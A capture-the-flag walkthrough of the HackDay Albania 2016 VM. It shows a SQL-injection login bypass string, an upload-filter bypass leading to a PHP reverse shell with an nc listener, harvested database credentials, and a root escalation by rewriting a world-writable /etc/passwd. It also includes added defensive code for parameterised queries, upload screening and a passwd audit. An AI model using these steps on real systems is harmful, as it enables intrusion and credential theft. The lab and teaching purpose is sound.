HackDay CTF 2016 (Albania)
Location
https://download.vulnhub.com/hackday/HackDay-Albania.ova
Introduction
Hack Day Albania is an event that brings together students passionate about cyber security. It is organized for the second consecutive year by ALCIRT with the support of MIAP.
Getting Started
Starting with an nmap scan.
┌─[n13mant@planetmars]─[~]
└──╼ $sudo nmap -A -T4 -sSV -p- 192.168.171.3

Starting Nmap 7.31 ( https://nmap.org ) at 2016-11-28 09:46 CET
Nmap scan report for 192.168.171.3
Host is up (0.00023s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 39:76:a2:f0:82:5f:1f:75:0d:e4:c4:c5:a7:48:b1:58 (RSA)
|_  256 21:fe:63:45:2c:cb:a1:f1:b6:ba:36:dd:ed:d3:d9:48 (ECDSA)
8008/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 26 disallowed entries (15 shown)
| /rkfpuzrahngvat/ /slgqvasbiohwbu/ /tmhrwbtcjpixcv/
| /vojtydvelrkzex/ /wpkuzewfmslafy/ /xqlvafxgntmbgz/ /yrmwbgyhouncha/
| /zsnxchzipvodib/ /atoydiajqwpejc/ /bupzejbkrxqfkd/ /cvqafkclsyrgle/
|_/unisxcudkqjydw/ /dwrbgldmtzshmf/ /exschmenuating/ /fytdinfovbujoh/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: HackDay Albania 2016
MAC Address: 08:00:27:98:0D:5F (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.23 ms 192.168.171.3

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.08 seconds
No usable banner information on port 22, so I check the website on port 8008.
The nmap scan showed a 'robots.txt' with a long list of disallowed directories.
Because I don't speak Albanian, I let Google Translate handle the text I found: "If I am, I know where to go ;)"
After closing the pop-up box, Elliot from the show Mr. Robot is visible.
First I check the source code. There is a comment at the bottom: "OK ok, but not here :)"
The background picture didn't have any information in it, so I start with the first page listed in 'robots.txt'.
Great... memes with Albanian text. I hope Google doesn't mess up the translations and point me in the wrong direction.
The translated text on the meme is: Is this the proper directory. Or is it jerk.
Right. After checking the second page it seems I'm being trolled. To automate my search a bit, I create a small bash script that cURLs the pages for me and saves the HTML. If one page is different from the rest, the output should show it.
#!/bin/bash
# Fetch every path listed in the file 'list' (one robots.txt entry per line)
# and append the HTML to curl.txt, with a marker so each response can be
# matched back to the path that produced it.
while read -r x
do
    echo "===== $x =====" >> curl.txt
    curl -s "192.168.171.3:8008/$x" >> curl.txt
done < list
When entering a single quote, I get the following error.
Looks like a SQLi vulnerability. At first I tried SQLMap, but it couldn't retrieve the databases. After a while I searched the internet for information about SQL authentication bypass and found a nice list which I could load into Burp Suite. Unfortunately I couldn't get this to work either. But the idea of the list sounded good, so I started to probe manually and after some time (a lot), I got in using the string '%1#
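Why a single quote produces an error and why a crafted username gets you past the login is easiest to see side by side. The following is an added example and not code from the HackDay VM: it assumes the login query has the usual shape (username and password compared as string literals) and uses an in-memory SQLite table with the klienti columns and rows from the dump later in this writeup. SQLite does not treat '#' as a comment the way MySQL does, so the bypass input here ends in '--' instead of the '%1#' string used above; the point, that parameter binding turns the same input into harmless data, is the same.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed stand-in for bank_database.klienti (rows taken from the writeup's dump)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE klienti (ID INTEGER PRIMARY KEY, emer TEXT, mbiemer TEXT, "
        "bilanci INTEGER, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO klienti VALUES (?, ?, ?, ?, ?, ?)",
        [
            (1, "Charles D.", "Hobson", 25000, "hobson", "Charles123"),
            (2, "Jeffery", "Fischer", 120000, "jeff", "jeff321"),
        ],
    )
    return conn


def vulnerable_login(conn, username, password):
    """String-concatenated query: the user's input becomes part of the SQL text."""
    sql = (
        "SELECT username FROM klienti WHERE username='" + username
        + "' AND password='" + password + "'"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def safe_login(conn, username, password):
    """Parameterised query: the driver binds the values, so quotes stay data.

    (The page's app also stores passwords in plaintext; a real fix would hash
    them as well, which is left out here to keep the injection point in focus.)
    """
    row = conn.execute(
        "SELECT username FROM klienti WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def demo() -> dict:
    """Run both logins against the same inputs and collect what happened."""
    conn = build_db()
    results = {}
    # 1. A lone single quote breaks the concatenated query's syntax. That
    #    database error leaking to the browser is the symptom seen above.
    try:
        vulnerable_login(conn, "'", "x")
        results["vuln_quote"] = "no error"
    except sqlite3.OperationalError:
        results["vuln_quote"] = "syntax error"
    # 2. A comment-terminated username makes the WHERE clause always true and
    #    drops the password check, so the first user comes back.
    results["vuln_bypass"] = vulnerable_login(conn, "' OR 1=1 --", "x")
    # 3. The parameterised version treats both inputs as literal strings.
    results["safe_quote"] = safe_login(conn, "'", "x")
    results["safe_bypass"] = safe_login(conn, "' OR 1=1 --", "x")
    results["safe_valid"] = safe_login(conn, "hobson", "Charles123")
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The detection angle for a defender is the first case: a login form that answers a stray quote with a database error message is reporting its own injection point, so error pages should never echo the backend's message, and the query itself should be parameterised.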
An upload mechanism. First I try to upload a PHP file containing phpinfo().
To bypass the upload check I change the filename and MIME type with Burp Suite.
When I view the ticket, I see that the uploaded PHP is executed.
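The filename and MIME type that Burp Suite changed here are both chosen by the sender, so a server that relies on them is trusting the attacker. As an added example, not code from the vulnbank application, this is how a server-side screening step can decide on the file itself: an extension allowlist, a check that the bytes actually start like the claimed image type, no second extension, and a random server-chosen name on disk. The allowlist and the sample files are constructed for the example.

```python
import os
import secrets

# Constructed allowlist: extensions the form is meant to accept, each paired
# with the magic bytes a genuine file of that type starts with.
IMAGE_SIGNATURES = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}


def screen_upload(client_filename: str, content: bytes) -> tuple:
    """Decide whether an uploaded file may be stored.

    Returns (True, server_filename) or (False, reason). The client-declared
    MIME type is deliberately not a parameter: like the filename it is set by
    the sender, which is exactly what was edited in Burp Suite above.
    """
    # Strip directory components so "../../x.jpg" cannot escape the upload dir.
    base = os.path.basename(client_filename)
    root, ext = os.path.splitext(base)
    ext = ext.lower()
    if ext not in IMAGE_SIGNATURES:
        return False, f"extension {ext or '(none)'} not in allowlist"
    # "shell.php.jpg" style names: depending on its configuration Apache can
    # hand inner extensions to a handler, so refuse anything with a second one.
    if os.path.splitext(root)[1]:
        return False, "multiple extensions not allowed"
    # Look at the bytes, not the name: a PHP file renamed to .jpg fails here.
    if not content.startswith(IMAGE_SIGNATURES[ext]):
        return False, "content does not look like the claimed image type"
    # Never reuse the client name on disk; pick a random one with the vetted extension.
    return True, secrets.token_hex(16) + ext


if __name__ == "__main__":
    # Constructed samples: a real-looking JPEG header and a PHP file under two names.
    jpeg = b"\xff\xd8\xff\xe0\x00\x10JFIF" + b"\x00" * 8
    php = b"<?php phpinfo(); ?>"
    for name, data in [("photo.jpg", jpeg), ("info.php", php),
                       ("info.jpg", php), ("shell.php.jpg", jpeg)]:
        print(name, "->", screen_upload(name, data))
```

Screening is only half of it: the stored files should live outside the web root, or in a directory where the PHP engine is switched off (for Apache with mod_php, `php_admin_flag engine off` in that directory's configuration), so that even a file which slips through is served as bytes and never run.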
Time for a reverse shell. I use the PHP reverse shell script from pentestmonkey and upload it to the server. From the browser I view the 'ticket' and the script gets executed. I have my reverse shell.
┌─[n13mant@planetmars]─[~]
└──╼ $nc -lvnp 31337
listening on [any] 31337 ...
connect to [192.168.171.2] from (UNKNOWN) [192.168.171.3] 34432
Linux hackday 4.4.0-45-generic #66-Ubuntu SMP Wed Oct 19 14:12:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
 18:22:55 up  8:45,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python -c 'import pty;pty.spawn("/bin/bash");'
/bin/sh: 2: python: not found
$ whereis python
python: /usr/bin/python3.5m /usr/bin/python3.5 /usr/lib/python3.5 /usr/lib/python2.7 /etc/python3.5 /usr/local/lib/python3.5 /usr/share/python
$ python3 -c 'import pty;pty.spawn("/bin/bash");'
www-data@hackday:/$
Now for some reconnaissance.
www-data@hackday:/$ cat /etc/*-release
cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.1 LTS"
NAME="Ubuntu"
VERSION="16.04.1 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04.1 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
UBUNTU_CODENAME=xenial
www-data@hackday:/$ uname -a
uname -a
Linux hackday 4.4.0-45-generic #66-Ubuntu SMP Wed Oct 19 14:12:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
www-data@hackday:/var/www/html/unisxcudkqjydw/vulnbank/client$ cat config.php | more
<?php
-----[SNIP]-----
$db_host = "127.0.0.1";
$db_name = "bank_database";
$db_user = "root";
$db_password = "NuCiGoGo321";
-----[SNIP]-----
www-data@hackday:/$ netstat -l
netstat -l
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 localhost:mysql         *:*                     LISTEN
tcp        0      0 *:ssh                   *:*                     LISTEN
tcp6       0      0 [::]:8008               [::]:*                  LISTEN
tcp6       0      0 [::]:ssh                [::]:*                  LISTEN
www-data@hackday:/$ mysql --host=localhost --user=root --password=NuCiGoGo321 bank_database
mysql: [Warning] Using a password on the command line interface can be insecure.
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 29
Server version: 5.7.12-0ubuntu1.1 (Ubuntu)

Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| bank_database      |
| mysql              |
| performance_schema |
| sys                |
| vulnbank           |
+--------------------+
6 rows in set (0.00 sec)

mysql> use bank_database
use bank_database
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+-------------------------+
| Tables_in_bank_database |
+-------------------------+
| klienti                 |
| tickets                 |
+-------------------------+
2 rows in set (0.00 sec)

mysql> select * from klienti;
select * from klienti;
+----+------------+---------+---------+----------+------------+
| ID | emer       | mbiemer | bilanci | username | password   |
+----+------------+---------+---------+----------+------------+
|  1 | Charles D. | Hobson  |   25000 | hobson   | Charles123 |
|  2 | Jeffery    | Fischer |  120000 | jeff     | jeff321    |
+----+------------+---------+---------+----------+------------+
2 rows in set (0.00 sec)
www-data@hackday:/$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
taviso:x:1000:1000:Taviso,,,:/home/taviso:/bin/bash
www-data@hackday:/$ ls -lah /etc | grep passwd
ls -lah /etc | grep passwd
-rw-r--rw- 1 root root 1.6K Oct 22 17:21 passwd
www-data@hackday:/etc$ ls -lah /home/taviso
ls -lah /home/taviso
total 32K
drwxr-xr-x 4 taviso taviso 4.0K Oct 29 23:07 .
drwxr-xr-x 3 root   root   4.0K Oct  9 13:13 ..
-rw------- 1 root   root     17 Oct 29 23:07 .bash_history
-rw-r--r-- 1 taviso taviso  220 Oct  9 13:13 .bash_logout
-rw-r--r-- 1 taviso taviso 3.7K Oct  9 13:13 .bashrc
drwx------ 2 taviso taviso 4.0K Oct  9 13:16 .cache
drwxrwxr-x 2 taviso taviso 4.0K Oct 29 23:07 .nano
-rw-r--r-- 1 taviso taviso  655 Oct  9 13:13 .profile
-rw-r--r-- 1 taviso taviso    0 Oct 29 23:07 .sudo_as_admin_successful
www-data@hackday:/$ cat /etc/group | grep taviso
cat /etc/group | grep taviso
adm:x:4:syslog,taviso
cdrom:x:24:taviso
sudo:x:27:taviso
dip:x:30:taviso
plugdev:x:46:taviso
lxd:x:110:taviso
taviso:x:1000:
lpadmin:x:117:taviso
sambashare:x:118:taviso
So 'taviso' is in the sudo group and /etc/passwd is world-writable (-rw-r--rw-), so www-data can replace the 'x' in taviso's entry with a password hash of its own.
┌─[n13mant@planetmars]─[~/Desktop]
└──╼ $mkpasswd --method=sha-512 password
$6$g9iswtWV1RYT$mfBdmezBzIz7v5pclDon55UwVuxqTBYDaeXqBdYP15xnu8zDZQ9rK5iput6mJSMut44E3hydQeYsLFfp8LUzz1
www-data@hackday:/$ sed -e 's/taviso:x/taviso:$6$g9iswtWV1RYT$mfBdmezBzIz7v5pclDon55UwVuxqTBYDaeXqBdYP15xnu8zDZQ9rK5iput6mJSMut44E3hydQeYsLFfp8LUzz1/g' /etc/passwd > /tmp/passwd
www-data@hackday:/$ cp /tmp/passwd /etc/passwd
cp /tmp/passwd /etc/passwd
www-data@hackday:/$ cat /etc/passwd | grep taviso
cat /etc/passwd | grep taviso
taviso:$6$g9iswtWV1RYT$mfBdmezBzIz7v5pclDon55UwVuxqTBYDaeXqBdYP15xnu8zDZQ9rK5iput6mJSMut44E3hydQeYsLFfp8LUzz1:1000:1000:Taviso,,,:/home/taviso:/bin/bash
www-data@hackday:/$ su taviso
su taviso
Password: password
taviso@hackday:/$ sudo -l
sudo -l
Matching Defaults entries for taviso on hackday:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User taviso may run the following commands on hackday:
    (ALL : ALL) ALL
taviso@hackday:/$ sudo su
sudo su
root@hackday:/# cd /root
cd /root
root@hackday:~# ls -lah
ls -lah
total 28K
drwx------  3 root root 4.0K Oct 22 17:21 .
drwxr-xr-x 23 root root 4.0K Oct 26 21:48 ..
-rw-------  1 root root   58 Oct 22 17:21 .bash_history
-rw-r--r--  1 root root 3.1K Oct 22  2015 .bashrc
-rw-r--r--  1 root root   61 Oct  9 13:36 flag.txt
drwxr-xr-x  2 root root 4.0K Oct  9 13:18 .nano
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
root@hackday:~# cat flag.txt
cat flag.txt
Urime, Tani nis raportin!
d5ed38fdbf28bc4e58be142cf5a17cf5
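The privilege escalation above rests on two things a defender can check for mechanically: /etc/passwd being writable by others, and the fact that login still honours a hash placed directly in the second field of /etc/passwd instead of the 'x' that points to /etc/shadow. The following is an added audit script, not something from the VM or the writeup, that reads the two files' contents and the passwd mode and reports all three conditions (inline hash, world-writable file, sudo group membership). The sample passwd and group text and the placeholder hash are constructed for the example, modelled on the output above; audit_live() shows the same checks pointed at a real system.

```python
import os
import stat

# Values in the second /etc/passwd field that mean "no inline password":
# "x" defers to /etc/shadow, "*" and the "!" variants mark a locked account.
SHADOW_MARKERS = {"x", "*", "!", "!!", "!*"}


def passwd_field_findings(passwd_text: str) -> list:
    """Flag entries whose password field holds a hash or is empty."""
    findings = []
    for line in passwd_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(f"malformed entry: {line!r}")
            continue
        user, pw_field = fields[0], fields[1]
        if pw_field == "":
            findings.append(f"{user}: empty password field, login needs no password")
        elif pw_field not in SHADOW_MARKERS:
            findings.append(f"{user}: password hash stored inline in /etc/passwd")
    return findings


def sudo_members(group_text: str) -> list:
    """Return the explicit members of the sudo group from /etc/group text."""
    for line in group_text.splitlines():
        fields = line.split(":")
        if len(fields) == 4 and fields[0] == "sudo":
            return [m for m in fields[3].split(",") if m]
    return []


def is_world_writable(mode: int) -> bool:
    """True when the 'other' write bit is set (the -rw-r--rw- case above)."""
    return bool(mode & stat.S_IWOTH)


def audit(passwd_text: str, group_text: str, passwd_mode: int) -> list:
    """Combine the three checks into one list of findings."""
    findings = passwd_field_findings(passwd_text)
    if is_world_writable(passwd_mode):
        findings.append(f"/etc/passwd mode {oct(passwd_mode)} is world-writable")
    members = sudo_members(group_text)
    if members:
        findings.append("sudo group members: " + ", ".join(members))
    return findings


# Constructed sample modelled on the writeup's output after the edit to
# taviso's entry; the hash is a placeholder, not a real SHA-512 crypt string.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
taviso:$6$SALTPLACEHOLDER$HASHPLACEHOLDER:1000:1000:Taviso,,,:/home/taviso:/bin/bash
"""
SAMPLE_GROUP = "adm:x:4:syslog,taviso\nsudo:x:27:taviso\ntaviso:x:1000:\n"
SAMPLE_PASSWD_MODE = 0o646  # -rw-r--rw-, as shown by ls -lah /etc above


def run_audit() -> list:
    """Run the checks over the constructed sample."""
    return audit(SAMPLE_PASSWD, SAMPLE_GROUP, SAMPLE_PASSWD_MODE)


def audit_live() -> list:
    """Run the same checks against the real files of the host this runs on."""
    with open("/etc/passwd") as f:
        passwd_text = f.read()
    with open("/etc/group") as f:
        group_text = f.read()
    mode = stat.S_IMODE(os.stat("/etc/passwd").st_mode)
    return audit(passwd_text, group_text, mode)


if __name__ == "__main__":
    for finding in run_audit():
        print(finding)
```

Run as a cron job or a configuration check, the first two findings are the ones to treat as incidents: a correctly maintained Ubuntu system has /etc/passwd at mode 0644 and every second field set to 'x'. The sudo membership line is just context that tells you which inline hash matters most.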
And that's it. The last part said: "Congratulations, Now begins the report!" (or at least that's what Google makes of it).
The flag is an MD5 hash; its plaintext is "rio".
THE END